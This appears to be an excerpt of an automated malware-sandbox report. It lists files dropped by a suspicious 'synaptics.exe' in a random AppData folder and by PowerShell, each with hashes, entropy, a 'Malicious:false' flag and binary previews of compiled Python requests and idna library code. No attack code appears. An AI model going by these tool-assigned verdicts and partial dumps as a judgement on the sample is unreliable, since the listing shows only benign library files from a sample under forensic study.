                                                                                                                                                                                                            Preview:o..........g.1.......................@...s^\..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1963
                                                                                                                                                                                                            Entropy (8bit):5.313111871230384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:frDo6itCRy/ORh72yzN+Rl/99X7iEvR9Bn:frc7kR2oNC/9t7jvN
                                                                                                                                                                                                            MD5:368DA43E00376CE06190E1EC054A6EB1
                                                                                                                                                                                                            SHA1:B6294FCC35777C4526E73EAE394FE43F590C4242
                                                                                                                                                                                                            SHA-256:304989BF21C0075B83B837EBA449783D72836C9C8229648810D021BDE594BFF0
                                                                                                                                                                                                            SHA-512:BDAD0A7A7F3652E80FD4E825559F656F20CA0A85ED0800D51250C7B6553F28BA0B498847E3AA0A7E4FEA57E13A0EA7323511479496CC863701707F0E87CAE000
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                            Entropy (8bit):4.91390070140503
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/TTAl/uletxbkCohtt/lPlAPt+kiE2J5dj/a6iVWrzSBw5JOmIOt2TgN:y/gqetGCohrMwkn23h/a/ArmBw5Amptz
                                                                                                                                                                                                            MD5:97404EF4B7360EF2AD9AB3E33A887662
                                                                                                                                                                                                            SHA1:CC85077BF120D6B7D513164A47FE7335DAEA4178
                                                                                                                                                                                                            SHA-256:0E35173FA2BB14C5E9D057D004F1884C64816C24E818B46F922CD43F572E9E41
                                                                                                                                                                                                            SHA-512:B4AEE8D67FAD4952B8920CC1FDC66CB8255D134BF89B4F7022E992DCD24D9909439F6893725EF6747C3B59D91D43EB0C0EB02A2F91A8A705E2CAC18E97101A07
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.S.).z.3.10N)...__version__..r....r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4033
                                                                                                                                                                                                            Entropy (8bit):5.803257414607532
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9iuxd46eYVGivMXrFlVmWNgSdAhoN+aXQx4R49bWQX7SftGFrUl:se7MXrhgSehIQt9vLSB
                                                                                                                                                                                                            MD5:C4C229A97FC12EEEE99CDA6CB7127FF4
                                                                                                                                                                                                            SHA1:D630C30973D10E6BCA7773C82D9F55D3D43932CC
                                                                                                                                                                                                            SHA-256:939CC8D4BC3C1ECE72AD16964978D8FC677A62A2F34BF99674828EA6A1DB5F8A
                                                                                                                                                                                                            SHA-512:1CBDAE1E626091BD9B940775A892934B8FED27E417E81ADAA498DBC6A378AB066F530EBF6D354385745EE59809F8F96717008BBAABBAA67556D83AB17D29C2E9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g:........................@...sD...d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.z.d.d.l.m.Z...W.n...e.y'......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.yP......e...d...e.j.e.e...e.....Y.n.w.z:d.d.l.m.Z...e.s^e.d.....z.d.d.l.Z.W.n...e.yo......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m Z m!Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m.Z...d.d.l+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..d.d.l.m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<m=Z=..d.d.l>m?Z?m@Z@mAZA..d.d.lBmCZCmDZD..d.d.lEmFZF..e..GeH...Ie.......e.j.d.e6d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2'). >>
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):567
                                                                                                                                                                                                            Entropy (8bit):5.522388869777952
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQg+UexOsG8ReRyu7msv+V5b4StJzcAFAu63WcbR/2Isaid7hooookk:9FxdOyqmsvS5TJzcAFAu6p12L/hek
                                                                                                                                                                                                            MD5:CC4F923CEC70C6A23680D1624D6D460A
                                                                                                                                                                                                            SHA1:D360B7F8509FC8A443EE03086BDF59007CDB7BFD
                                                                                                                                                                                                            SHA-256:D1BBF5DCABFE92DEC501C9E78C80A7394FDE27130DF59B2E62A83FA3940DCB45
                                                                                                                                                                                                            SHA-512:E74E7C5BE4E543EC386F6561CD64EA9F43339B5FAD4A7607A4EFD45739D255E83E71625A02BECF9F58B851AD504BEFFEE2BCB65110DE540040E04E691A23386E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.28.2i.(..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache 2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....wC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/requests/__version__.py..<module>....s........................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1582
                                                                                                                                                                                                            Entropy (8bit):5.615670674740834
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9xB8JmpGWydoNxLz2Pcr1OlX4Ja+MrAS4:9xBC95+ntpYqaNrAS4
                                                                                                                                                                                                            MD5:10DFF82CD53617AB9BB71A33197F59CC
                                                                                                                                                                                                            SHA1:F62CD8CC5FD391FCE16D2C642ABFD6298AEF1B0E
                                                                                                                                                                                                            SHA-256:742B5B559BA5CEACB184709D362B1B5D5F51F94F43E3328F72AB3058E02F4E0B
                                                                                                                                                                                                            SHA-512:0ADA062D298A864E45C4BC8E38335F78E6188D4BEAE965AC6834BFEC9CCE3EC45DA0F5C48B66F1A6DBF349D089F60422071284F12A0AE771FCDBAC1C20269DA6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gu........................@...sj...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.e.f.e.e.e.f.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....{C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/requests/_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6671
                                                                                                                                                                                                            Entropy (8bit):5.138839535941328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9++4kMfrO7AyGLluXWC7ZolNAzj8t8VYat9e1QO5QMEQcih:pMDY7EoZjM8QF5dE0h
                                                                                                                                                                                                            MD5:B477BC019FFA7E2155BAEAAA83DA3F7A
                                                                                                                                                                                                            SHA1:41683CD07614B170CC635C174AF01F33FFD614B5
                                                                                                                                                                                                            SHA-256:E8012CE2F185F61D53B38E8F805DF0061D6BA4260E7EA4B4BBAC1AB993FABAD5
                                                                                                                                                                                                            SHA-512:259C6D7DD0864CF858C539A8190E0464AA6DB73E9B8211899E58B7104973A35EEF9B083F5A7EC883F28AC82E3E9DF8D9635FD751D9F831E24436EAFA90D1119D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8139
                                                                                                                                                                                                            Entropy (8bit):5.49520048250886
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:QB0BV0AGLLPVCFA1Pnrs0sG22VjwChNM27Sy:o0BOAMVCOPnrshG22aiNh
                                                                                                                                                                                                            MD5:D10923F03B601BD45195790A01E5A329
                                                                                                                                                                                                            SHA1:4F19480002275193ADE7696F177E24A049D04141
                                                                                                                                                                                                            SHA-256:E43E3B1A67E744D1E134A634A81BCE808184D8ED2C50DD7FB7105993CFD56331
                                                                                                                                                                                                            SHA-512:BC4A38231072D6B4B4D29CF4465AD93806B3A47DC70ED2721BDDAAF0C146FB1AB97AD177C431D69251998AEC2F648C79B44712A3DDBC0FCCDB669D536975FDF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):826
                                                                                                                                                                                                            Entropy (8bit):5.326609090667566
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQKe6Btc/lHE1A3Dj4uIy1XfB4A4kvYa4ZkialHKzE9g/2IsaiU4LBQkPEbcOrN:9COlkgbXKAhwa9Fl5A2L/UIBQNjN
                                                                                                                                                                                                            MD5:C3CF7F77B24FEE3E16AB1E0728D84D43
                                                                                                                                                                                                            SHA1:79D9A7D5BBC0EA8F6D76CEA8C7F7BC51AC3EE8C9
                                                                                                                                                                                                            SHA-256:28B756AE1EB1594E8D250B13345B31768E128FAB5DBEDF7D1ECCC61CC2F6C010
                                                                                                                                                                                                            SHA-512:281F81E9597DC5D7B3C9BC843E0DEC7B85BAE18C537603E311CA45E190D6FAC7B484310460FDD2AE1DE2DB45FC9197C3CAA3D00CB6C9F947EA348CFD4DA2DDE7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g?........................@...sF...d.Z.d.d.l.Z.d.e.j.v.r.d.d.l.m.Z...n.d.d...Z.e.d.k.r!e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......N.._PIP_STANDALONE_CERT)...wherec....................C...s....t.j.d...S.).Nr....)...os..environ..r....r.....qC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/requests/certs.pyr........s......r......__main__)...__doc__r....r......pip._vendor.certifir......__name__..printr....r....r....r......<module>....s....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1388
                                                                                                                                                                                                            Entropy (8bit):5.593594007296966
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9JaB0Xn4/9NJOWQGX0yyOMmyRFxFWzlKjPggN5LByZEToKgyRiw2L/UJsOr8+:9Et4GXHyOLyRolcPVJoXw2gKOr8+
                                                                                                                                                                                                            MD5:D1E1FD1B6EF6E41DEC733A961B07309E
                                                                                                                                                                                                            SHA1:8688CEC61C38624E29E4CF20A05507F128DE5C2D
                                                                                                                                                                                                            SHA-256:49137AF53AF6CCDD5FFF3309BD2AE651F1925CF8FBC99B535112DA9EE008684B
                                                                                                                                                                                                            SHA-512:B0418BF7BB3DD791D2C90171637A2A8204E66DDAFB816F708D2A17FE6B39A8A0495A29722AE11D94A6AD788775F377C6A15A944FB1D747C788157FF2DAAE9902
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!..d.d.l"m#Z#m$Z$m%Z%m&Z&m'Z'..e(Z)e(Z(e*Z*e(e*f.Z+e,e-f.Z.e,f.Z/d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......)...chardetN..........)...JSONDecodeError)...OrderedDict)...Callable..Mapping..MutableMapping)...cookiejar)...Morsel)...StringIO)...quote..quote_plus..unquote..unquote_plus..urldefrag..urlencode..urljoin..urlparse..urlsplit..urlunparse)...getproxies..getproxies_environment..parse_http_list..proxy_bypass..proxy_bypass_environment)0..__doc__..pip._vendorr......sys..version_info.._ver..is_py2..is_py3..jsonr......collectionsr......collections.abcr....r....r......httpr......cookielib..http.cookie
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18708
                                                                                                                                                                                                            Entropy (8bit):5.260049868714651
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nElpXhq1n08OcFwpQPmoGVcA8YIz2YZFAGkRAIMMvdVQEkDAC9v:nE/XhMn08H+psBgAMKGBRMMlJonB
                                                                                                                                                                                                            MD5:92F5D06DDDFF930EBBD0A385B078B09B
                                                                                                                                                                                                            SHA1:3FC67B47D1EB0966735500255A69F2D99935F8D6
                                                                                                                                                                                                            SHA-256:316E45DA211DB0CC8CA2521761E5968E6D67886B105D464D8927787607136352
                                                                                                                                                                                                            SHA-512:C5F1EE769A540C209D9C04621E7AD12258FA64E5BE29FB2359015C032B4F75B55BC508D310B5E9EDB20A4EDB8720AAEDB5E04F360FBB0B6FD0D34E551E380E63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `cookielib.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `cookielib.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of the request
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5758
                                                                                                                                                                                                            Entropy (8bit):4.90822211326461
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:98rpcwB6fIldt9kDPK7hDkuhRAnRJ78ov4y0Xx:GrpWIlv9ujQPh
                                                                                                                                                                                                            MD5:32FBE4B3EC38B438DBFACE507B4A2C73
                                                                                                                                                                                                            SHA1:2C2A5C219DABCAA59F92882F0ACF975AD798C667
                                                                                                                                                                                                            SHA-256:30187CFDC0A4ECC59BC711E90CCB2264D99E23B5277333639546053E2D5F5D21
                                                                                                                                                                                                            SHA-512:A606CA717061A47D09DEB03143954A3A6FF5B1CE0413BE5FFFF47058FA83611F29E6575F42A4A7672965969B66C90EE4FAD8C779DBA8E6D358A96A798063EF3E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2884
                                                                                                                                                                                                            Entropy (8bit):5.572881521704288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9rmlV6Yog31bYMh2QD7dD0erRcbUBOqAs92J22OtDtF6NR/NNC6epHju0pcl9tSE:9rzo3hYMh2QDBYerRxgXs9kW74lNC6ie
                                                                                                                                                                                                            MD5:0E7D6A522454A454A5C3E67E3D0F8D3A
                                                                                                                                                                                                            SHA1:ACD27A16F8AA020B5330490B6DE51C805804FD3D
                                                                                                                                                                                                            SHA-256:69F9095372A94238CC048B841F7A9A079DB6780A6DC0275741FC31AF66C899AD
                                                                                                                                                                                                            SHA-512:A994F2C505A1132B2C2C317970E8669BEF928E2FA9C7AD1FBDF6D016597AB4DB6C189512B97037640D2D8C5C54C2672512242B21CFE72F243E75E2C7DB4D7413
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g'........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.z.d.d.l.m.Z...W.n...e.y9......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yQ......d.Z.d.Z.d.Z.Y.n.w.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.roe.....d.S.d.S.).z'Module containing bug report helper(s)......N)...idna)...urllib3.....)...__version__)...chardet)...pyopensslc....................C...s....t.....}.|.d.k.r.t.....}.n5|.d.k.r.d...t.j.j.t.j.j.t.j.j...}.t.j.j.d.k.r-d...|.t.j.j.g...}.n.|.d.k.r7t.....}.n.|.d.k.r@t.....}.n.d.}.|.|.d...S.).a....Return a dict with the Python implementation and version... Provide both the name and the version of the Python implementation. currently running. For example, on CPython 3.10.3 it will return. {'name': 'CPython', 'version': '3.10.3'}... This function works best on CPython and PyPy: in particular, it probably. doesn't work for Jython or IronPython. Future investigation should be done. to work out the correct shape o
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1011
                                                                                                                                                                                                            Entropy (8bit):5.261357697088551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9zx1qlJ5pMUqTDP/+/kNA2L/LY+qnvWZ3b1eF:96RyDPGOA2nYxS3bUF
                                                                                                                                                                                                            MD5:278A32F20503D8CB2BA1BCFF7356D702
                                                                                                                                                                                                            SHA1:E2123B911D20F3E452814670278DCFBEAB8A17EE
                                                                                                                                                                                                            SHA-256:9711C74EBF39E6A09F4A58FA29A21E172BB1B06BFED3E808AC7F662AA6592B57
                                                                                                                                                                                                            SHA-512:6E841F9B4F7CBD8FF43EC44FDD750613C5ACCE3D21F59668C273DEAACD28146BA6E5FCB4F007111B5883FE73CE3657E403DDA350CBD0F979FBBFE440D5A56ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....qC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/requests/hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooks..hook_data..kwargs..hook.._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24283
                                                                                                                                                                                                            Entropy (8bit):5.471752757790538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:j34ngRguYMhf7K2YbS62mOsZ0Eugm3qYBBTkp7EYLdyK4KFReUaMrJTEzOv69:j3znYMh/W63gm3DBBTk1EY8meUaM1EzH
                                                                                                                                                                                                            MD5:49A9CA061D9689429C33194B7601615B
                                                                                                                                                                                                            SHA1:07179517BD58689317B885C09C8B10EBC51ECE1F
                                                                                                                                                                                                            SHA-256:511F88AF8B8D4E141C6DC3C28131B3376BAA11DBCDC6A794B54212129BD2A005
                                                                                                                                                                                                            SHA-512:3F06BE73D034CD5B86F8C0A21A2C34290DC3B30587A44D4AB6E17E092D4E3C0BA6008931E58452EF3AA7084DB560A11A70DC4C85BA105CEFD51F106DA74082B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
